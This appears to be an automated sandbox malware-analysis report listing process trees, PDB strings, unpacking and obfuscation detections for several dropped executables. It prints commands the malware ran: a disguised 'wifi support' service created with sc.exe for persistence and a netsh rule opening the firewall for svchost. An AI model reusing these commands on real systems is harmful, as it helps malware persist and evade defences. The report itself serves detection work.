                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CFE8.exe C:\Users\user\AppData\Local\Temp\CFE8.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E2A6.exe C:\Users\user\AppData\Local\Temp\E2A6.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start txlhcyih
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: unknownProcess created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe"
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7D38.exe C:\Users\user\AppData\Local\Temp\7D38.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\96DB.exe C:\Users\user\AppData\Local\Temp\96DB.exe
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A15C.exe C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\96DB.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\63DC.bat C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8A6B.exe C:\Users\user\AppData\Local\Temp\8A6B.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CFE8.exe C:\Users\user\AppData\Local\Temp\CFE8.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E2A6.exe C:\Users\user\AppData\Local\Temp\E2A6.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start txlhcyih
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8A6B.tmpJump to behavior
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419C9A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6924:64:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6760
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCommand line argument: cbH
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: sbxGIUIhRd.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.771800332.0000000001127000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.770525500.0000000005019000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.772754936.0000000001121000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: MUC:\des.pdbh source: sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbz:^^ source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdby2V] source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbv source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb^ source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: C:\des.pdb source: sbxGIUIhRd.exe, sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdbl source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbj source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeUnpacked PE file: 18.2.CFE8.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeUnpacked PE file: 19.2.E2A6.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeUnpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeUnpacked PE file: 18.2.CFE8.exe.400000.0.unpack .text:ER;.data:W;.sutala:W;.buve:W;.bobe:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeUnpacked PE file: 19.2.E2A6.exe.400000.0.unpack .text:ER;.data:W;.tojid:W;.vese:W;.fikazap:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeUnpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack .text:ER;.data:W;.tojid:W;.vese:W;.fikazap:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binaryShow sources
                          Source: Yara matchFile source: 0000002E.00000003.893800912.00000000026D7000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872943037.000000000063A000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.873526703.0000000000AF0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.893714086.00000000026D0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.893898519.00000000024E0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872792348.00000000005B0000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872879776.0000000000630000.00000004.00000020.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0043DFD4 push es; retn 0042h
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00563634 push es; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005853C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00563634 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00643C00 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00866841 pushfd ; ret
